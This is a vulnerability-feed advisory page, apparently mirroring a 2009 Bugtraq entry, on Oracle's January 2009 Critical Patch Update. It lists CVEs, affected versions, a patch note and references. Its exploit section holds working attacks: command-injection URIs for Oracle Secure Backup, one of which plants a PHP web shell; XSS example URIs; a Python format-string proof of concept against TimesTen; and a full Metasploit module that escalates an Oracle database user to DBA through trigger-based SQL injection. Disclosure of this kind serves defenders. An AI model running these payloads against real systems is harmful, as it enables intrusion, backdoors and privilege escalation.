|
Feeds -
Exploits
|
|
Written by Deniz Cevik of Intellect; Andy Davis of Information Risk Management Plc (IRM Plc); Esteban Martinez Fayo of Application Security, Inc.; Franz Huell of Red Database Security; Wasim Iqbal; Joxean Koret; Joxean Koret of TippingPoint (3com); Alexander Kornbrus
|
|
Wednesday, 18 February 2009 20:35 |
Oracle January 2009 Critical Patch Update Multiple Vulnerabilities
-\\Bugtraq ID:
33177
-\\Class:
Unknown
-\\CVE:
CVE-2008-2623
CVE-2008-4014
CVE-2008-4017
CVE-2008-5438
CVE-2008-5446
CVE-2008-5450
CVE-2008-5454
CVE-2008-5458
CVE-2008-5457
CVE-2008-5459
CVE-2008-5460
CVE-2008-5461
CVE-2008-5462
CVE-2008-3973
CVE-2008-3974
CVE-2008-3978
CVE-2008-3979
CVE-2008-3997
CVE-2008-3999
CVE-2008-4015
CVE-2008-5436
CVE-2008-5437
CVE-2008-5439
CVE-2008-5447
CVE-2008-4016
CVE-2008-3981
CVE-2008-4006
CVE-2008-5441
CVE-2008-5442
CVE-2008-5443
CVE-2008-5444
CVE-2008-5445
CVE-2008-5448
CVE-2008-5449
CVE-2008-4007
CVE-2008-5451
CVE-2008-5452
CVE-2008-5455
CVE-2008-5456
CVE-2008-5463
CVE-2008-5440
-\\Remote:
Yes
-\\Local:
Yes
-\\Published:
Jan 08 2009 12:00AM
-\\Updated:
Feb 18 2009 05:27PM
-\\Credit:
Deniz Cevik of Intellect; Andy Davis of Information Risk Management Plc (IRM Plc); Esteban Martinez Fayo of Application Security, Inc.; Franz Huell of Red Database Security; Wasim Iqbal; Joxean Koret; Joxean Koret of TippingPoint (3com); Alexander Kornbrus
-\\Vulnerable:
Oracle TimesTen In-Memory Database 7.0.5.4.0
Oracle TimesTen In-Memory Database 7.0.5.3.0
Oracle TimesTen In-Memory Database 7.0.5.2.0
Oracle TimesTen In-Memory Database 7.0.5.1.0
Oracle Secure Backup 10.2.0.3
Oracle Secure Backup 10.2.0.2
Oracle Secure Backup 10.1.0.3
Oracle Secure Backup 10.1.0.2
Oracle Secure Backup 10.1.0.1
Oracle Oracle9i Standard Edition 9.2 .8DV
Oracle Oracle9i Standard Edition 9.2 .8
Oracle Oracle9i Personal Edition 9.2 .8DV
Oracle Oracle9i Personal Edition 9.2 .8
Oracle Oracle9i Enterprise Edition 9.2 .8DV
Oracle Oracle9i Enterprise Edition 9.2 .8
Oracle Oracle11g Standard Edition One 11.1 6
Oracle Oracle11g Standard Edition 11.1 6
Oracle Oracle11g Standard Edition 11.1 6
Oracle Oracle11g Enterprise Edition 11.1 6
Oracle Oracle10g Standard Edition 10.2 .3
Oracle Oracle10g Standard Edition 10.2 .2
Oracle Oracle10g Standard Edition 10.1 .5
Oracle Oracle10g Standard Edition 10.2.0.4
Oracle Oracle10g Personal Edition 10.2 .3
Oracle Oracle10g Personal Edition 10.2 .2
Oracle Oracle10g Personal Edition 10.1 .5
Oracle Oracle10g Personal Edition 10.2.0.4
Oracle Oracle10g Enterprise Edition 10.2 .3
Oracle Oracle10g Enterprise Edition 10.2 .2
Oracle Oracle10g Enterprise Edition 10.1 .5
Oracle Oracle10g Enterprise Edition 10.2.0.4
Oracle Oracle10g Enterprise Edition 10.2.0.2 64 bit
Oracle Oracle10g Application Server 10.1.3 .3.0
Oracle Oracle10g Application Server 10.1.2 .2.0
Oracle Oracle10g Application Server 10.1.2.3.0
Oracle Enterprise Manager Grid Control 10g 10.2.0.4
Oracle E-Business Suite 12 12.0.6
Oracle E-Business Suite 11i 11.5.10.2
Oracle Collaboration Suite Release 1 10.1.2
BEA Systems Weblogic Server 8.1 SP 6
BEA Systems Weblogic Server 8.1 SP 5
BEA Systems Weblogic Server 8.1 SP 4
BEA Systems Weblogic Server 8.1 SP 3
BEA Systems Weblogic Server 8.1 SP 2
BEA Systems Weblogic Server 8.1 SP 1
BEA Systems Weblogic Server 8.1
BEA Systems Weblogic Server 7.0 .0.1 SP 4
BEA Systems Weblogic Server 7.0 .0.1 SP 3
BEA Systems Weblogic Server 7.0 .0.1 SP 2
BEA Systems Weblogic Server 7.0 .0.1 SP 1
BEA Systems Weblogic Server 7.0 .0.1
BEA Systems Weblogic Server 7.0 SP 7
BEA Systems Weblogic Server 7.0 SP 6
BEA Systems Weblogic Server 7.0 SP 5
BEA Systems Weblogic Server 7.0 SP 4
BEA Systems Weblogic Server 7.0 SP 3
BEA Systems Weblogic Server 7.0 SP 2
BEA Systems Weblogic Server 7.0 SP 1
BEA Systems Weblogic Server 7.0
-HP HP-UX 11.0
-HP HP-UX 11i v1
-IBM AIX 4.3.3
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Professional SP2
-Microsoft Windows 2000 Professional SP1
-Microsoft Windows 2000 Professional
-Microsoft Windows 2000 Server SP2
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server
-Microsoft Windows NT Enterprise Server 4.0 SP6a
-Microsoft Windows NT Enterprise Server 4.0 SP6
-Microsoft Windows NT Enterprise Server 4.0 SP5
-Microsoft Windows NT Enterprise Server 4.0 SP4
-Microsoft Windows NT Server 4.0 SP6a
-Microsoft Windows NT Server 4.0 SP6
-Microsoft Windows NT Server 4.0 SP5
-Microsoft Windows NT Server 4.0 SP4
-Microsoft Windows NT Workstation 4.0 SP6a
-Microsoft Windows NT Workstation 4.0 SP6
-Microsoft Windows NT Workstation 4.0 SP5
-Microsoft Windows NT Workstation 4.0 SP4
-RedHat Linux 7.1 i386
-RedHat Linux 6.2 i386
-Sun Solaris 8
-Sun Solaris 2.7_sparc
-Sun Solaris 2.6_sparc
BEA Systems Weblogic Server 9.2 Maintenance Pack
BEA Systems Weblogic Server 9.2
BEA Systems Weblogic Server 9.1
BEA Systems Weblogic Server 9.1
BEA Systems Weblogic Server 9.0
BEA Systems Weblogic Server 8.1
BEA Systems Weblogic Server 7.0 SP7
BEA Systems Weblogic Server 10.3
BEA Systems Weblogic Server 10.3
BEA Systems Weblogic Server 10.0 MP1
BEA Systems Weblogic Server 10.0
BEA Systems Weblogic Server 10.0
BEA Systems WebLogic Portal 8.1 SP6
BEA Systems WebLogic Portal 8.1 SP5
BEA Systems WebLogic Portal 8.1 SP4
BEA Systems WebLogic Portal 8.1 SP3
BEA Systems WebLogic Portal 8.1 SP2
BEA Systems WebLogic Portal 8.1 SP1
BEA Systems WebLogic Portal 8.1
BEA Systems WebLogic Portal 9.2 MP3
BEA Systems WebLogic Portal 9.2
BEA Systems WebLogic Portal 10.3
BEA Systems WebLogic Portal 10.2
BEA Systems WebLogic Portal 10.0 MP1
BEA Systems WebLogic Portal 10.0
-\\Discussion
Oracle has released the January 2009 critical patch update. The update addresses 41 vulnerabilities affecting the following software:
Oracle Database
Oracle Secure Backup
Oracle TimesTen In-Memory Database
Oracle Application Server
Oracle Collaboration Suite
Oracle E-Business Suite Release
Oracle Enterprise Manager Grid Control
PeopleSoft Enterprise HRMS
JD Edwards Tools
Oracle WebLogic Server (formerly BEA WebLogic Server)
Oracle WebLogic Portal (formerly BEA WebLogic Portal)
-\\Exploit(s)/PoC(s):
Some of these issues may not require specific exploit code and may be trivial to exploit.
Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product for the issue documented by CVE-2008-5449. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following proof-of-concept URIs are available for Oracle Secure Backup:
1. Create a file in the directory "c:\":
https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+hello+world+%3E+c:\oracle.secure.backup.txt+;
2. Create a PHP backdoor:
https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+%22%3C%3Fphp+print(shell_exec(%24_GET%5B'a'%5D))%3B+%3F%3E%22+%3E+test.php%3B%26%26+echo
The following example URI is available for the Oracle Application Server portal:
http://www.example.com/sso/jsp/login.jsp?site2pstoretoken=XSS
PORTAL&search_type=XSS
The following example URI is available for Oracle Forms:
http://www.example.com/ifcgi60.exe?form=XSS
The following exploit and proof of concept are available:
===============================================================
CVE-2008-5440.py
^^^^^^^^^^^^^^^^^
#!/usr/bin/python
"""
Oracle TimesTen Remote Format String (Fixed in Oracle CPU Jan 2009
Copyright (c) Joxean Koret 2009
"""
import sys
import socket
def testPoc(host):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 17000))
buf = "GET evtdump?msg=AAAA%25n HTTP/1.0\r\n\r\n"
print "Sending: %s" % buf
s.send(buf)
print s.recv(4096)
s.close()
if __name__ == "__main__":
if len(sys.argv) == 1:
print "Usage:", sys.argv[0], "<target host>"
print
sys.exit(1)
else:
testPoc(sys.argv[1])
===============================================================
33177_droptable_trigger.rb
^^^^^^^^^^^^^^^^^^^^^^^^^^^
##
# $Id: droptable_trigger.rb
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger.',
'Description' => %q{
This module will escalate a Oracle DB user to MDSYS by exploiting an sql injection bug in
the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that exploit escalate user to DBA using "CREATE ANY TRIGGER" privilege
given to MDSYS user by creating evil trigger in system scheme (2-stage attack).
},
'Author' => [ 'Sh2kerr <research[ad]dsec.ru>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision:$',
'References' =>
[
[ 'CVE', '2008-3979' ],
[ 'URL', 'http://www.securityfocus.com/archive/1/500061' ],
[ 'URL', 'http://www.ngssoftware.com/' ],
],
'DisclosureDate' => 'Jan 13 2009'))
register_options(
[
OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']),
OptString.new('USER', [ false, 'The current user. ', 'SCOTT']),
OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']),
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
], self.class)
end
def run
name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
rand4 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
rand5 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
function1 = %Q|
CREATE OR REPLACE PROCEDURE #{name1}
AUTHID CURRENT_USER AS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}';
END;
|
function2 = %Q|
CREATE OR REPLACE FUNCTION #{name2} RETURN number AUTHID CURRENT_USER is
PRAGMA AUTONOMOUS_TRANSACTION;
STMT VARCHAR2(400):= 'create or replace trigger system.evil_trigger before insert on system.DEF$_TEMP$LOB DECLARE msg VARCHAR2(10);
BEGIN #{datastore['USER']}.#{name1};
end evil_trigger;';
BEGIN
EXECUTE IMMEDIATE STMT;
COMMIT;
RETURN 1;
END;
|
prepare ="create table \"O' and 1=#{datastore['USER']}.#{name2}--\"(id number)"
exploiting1 ="drop table \"O' and 1=#{datastore['USER']}.#{name2}--\""
exploiting2 = "insert into system.DEF$_TEMP$LOB (TEMP$BLOB) VALUES ('AA')"
fun1 = Rex::Text.encode_base64(function1)
fun2 = Rex::Text.encode_base64(function2)
prp = Rex::Text.encode_base64(prepare)
exp1 = Rex::Text.encode_base64(exploiting1)
exp2 = Rex::Text.encode_base64(exploiting2)
sql = %Q|
DECLARE
#{rand1} VARCHAR2(32767);
#{rand2} VARCHAR2(32767);
#{rand3} VARCHAR2(32767);
#{rand4} VARCHAR2(32767);
#{rand5} VARCHAR2(32767);
BEGIN
#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun1}')));
EXECUTE IMMEDIATE #{rand1};
EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name1} TO PUBLIC';
#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun2}')));
EXECUTE IMMEDIATE #{rand2};
EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name2} TO PUBLIC';
#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));
EXECUTE IMMEDIATE #{rand3};
#{rand4} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));
EXECUTE IMMEDIATE #{rand4};
#{rand5} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp2}')));
EXECUTE IMMEDIATE #{rand5};
END;
/
DROP FUNCTION #{name1};
DROP FUNCTION #{name2};
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sql)
end
end
-\\Solution
Oracle has released CPUJan2009 (Critical Patch Update January 2009) to address these issues. Contact the vendor for details on obtaining and applying the appropriate updates.
-\\References(s)
--ACROS Security Problem Report #2009-01-27-1
http://www.acrossecurity.com/aspr/ASPR-2009-01-27-1-PUB.tx (ACROS)
--Assurent VR - Oracle BEA WebLogic Server Apache Connector Buffer Overflow
msg://bugtraq/
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
(Assurent)
--CVE -2008- 5446 Sensitive Information Disclosure
http://secniche.org/papers/orabs.pd (SecNiche)
--Oracle Critical Patch Update - January 2009 - E-Business Suite Impact
http://www.integrigy.com/security-resources/analysis/Integrigy-Oracle-CPU-January-2009-Analysis.pdf/vie (Integrigy)
--Oracle Database 10g R2 Summary Advisor Arbitrary File Rewrite Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=76 (iDefense Labs )
--Oracle Homepage
http://www.oracle.co (Oracle)
--Oracle Secure Backup 10g Remote Code Execution
http://joxeankoret.com/blog/?p=3 (Joxean Koret)
--Oracle Secure Backup Administration Server login.php Command Injection Vulnerabi
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=76 (iDefense)
--Oracle Secure Backup Administration Server login.php Command Injection Vulnerabi
msg://bugtraq/
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
(iDefense)
--Oracle Secure Backup Administration Server login.php Command Injection Vulnerabi
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=76 (iDefense Labs )
--ACROS Security: HTML Injection in BEA (Oracle) WebLogic Server Console (ASPR #20
http://www.securityfocus.com/archive/1/50040 ("ACROS Security" )
--Advisory: Oracle EBusiness Suite Sensitive Information Disclosure
http://www.securityfocus.com/archive/1/50017 (SecNiche)
--Advisory: Oracle EBusiness Suite Sensitive Information Disclosure Vulnerability
http://www.securityfocus.com/archive/1/50017 (Aditya K Sood <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--iDefense Security Advisory 01.13.09: Oracle Database 10g R2 Summary Advisor Arbi
http://www.securityfocus.com/archive/1/50005 (iDefense Labs <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration Server
http://www.securityfocus.com/archive/1/50005 (iDefense Labs <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration Server
http://www.securityfocus.com/archive/1/50005 (iDefense Labs <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--Oracle Application Server 10g Cross Site Scripting Vulnerability
http://www.securityfocus.com/archive/1/50053 (
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
)
--Oracle CPU Jan 2009 Advisories
http://www.securityfocus.com/archive/1/50006 (Alexandr Polyakov <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--Oracle Forms Cross site Scripting in (iFcgi60.exe / f60servlet)
http://www.securityfocus.com/archive/1/50053 (
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
)
--Oracle Secure Backup 10g Remote Code Execution
http://www.securityfocus.com/archive/1/50007 (Joxean Koret <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--Oracle Secure Backup Multiple Denial Of Service vulnerabilities
http://www.securityfocus.com/archive/1/50011 ("
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
" <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--Oracle Secure Backup NDMP_CONECT_CLIENT_AUTH Command Buffer Overflow Vulnerabili
http://www.securityfocus.com/archive/1/50011 ("
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
" <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--Oracle Secure Backup's observiced.exe Denial Of Service vulnerability
http://www.securityfocus.com/archive/1/50011 ("
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
" <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--Oracle TimesTen Remote Format String
http://www.securityfocus.com/archive/1/50008 (Joxean Koret <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--Re: iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration Ser
http://www.securityfocus.com/archive/1/50011 (security curmudgeon <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--Team SHATTER Security Advisory: Oracle Database Buffer Overflow in SYS.OLAPIMPL_
http://www.securityfocus.com/archive/1/50063 (Shatter <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--Team SHATTER Security Advisory: SQL Injection in Oracle Enterprise Manager
http://www.securityfocus.com/archive/1/50062 (Shatter <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2
http://www.securityfocus.com/archive/1/50006 ("David Litchfield" <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2
http://www.securityfocus.com/archive/1/50006 (David Litchfield)
--ZDI-09-003: Oracle Secure Backup exec_qr()Command Injection Vulnerability
http://www.securityfocus.com/archive/1/50007 (
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
)
--ZDI-09-004: Oracle TimesTen evtdump Remote FormatString Vulnerability
http://www.securityfocus.com/archive/1/50007 (
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
)
--Oracle Critical Patch Update Advisory - January 2009
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.htm (Oracle)
--Oracle Critical Patch Update Pre-Release Announcement - January 2009
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.htm (Oracle)
--Oracle TimesTen Remote Format String
http://joxeankoret.com/blog/?p=4 (Joxean Koret)
--SECURITY ADVISORY (CVE-2008-5457)
https://support.bea.com/application_content/product_portlets/securityadvisories/2809.htm (BEA)
--SECURITY ADVISORY (CVE-2008-5459)
https://support.bea.com/application_content/product_portlets/securityadvisories/2807.htm (BEA)
--SECURITY ADVISORY (CVE-2008-5460)
https://support.bea.com/application_content/product_portlets/securityadvisories/2810.htm (BEA)
--SECURITY ADVISORY (CVE-2008-5461)
https://support.bea.com/application_content/product_portlets/securityadvisories/2811.htm (BEA)
--SECURITY ADVISORY (CVE-2008-5462)
https://support.bea.com/application_content/product_portlets/securityadvisories/2808.htm (BEA)
--ZDI-09-003 Oracle Secure Backup exec_qr() Command Injection Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-003 (ZDI)
--ZDI-09-004 Oracle TimesTen evtdump Remote Format String Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-004 (ZDI)
|
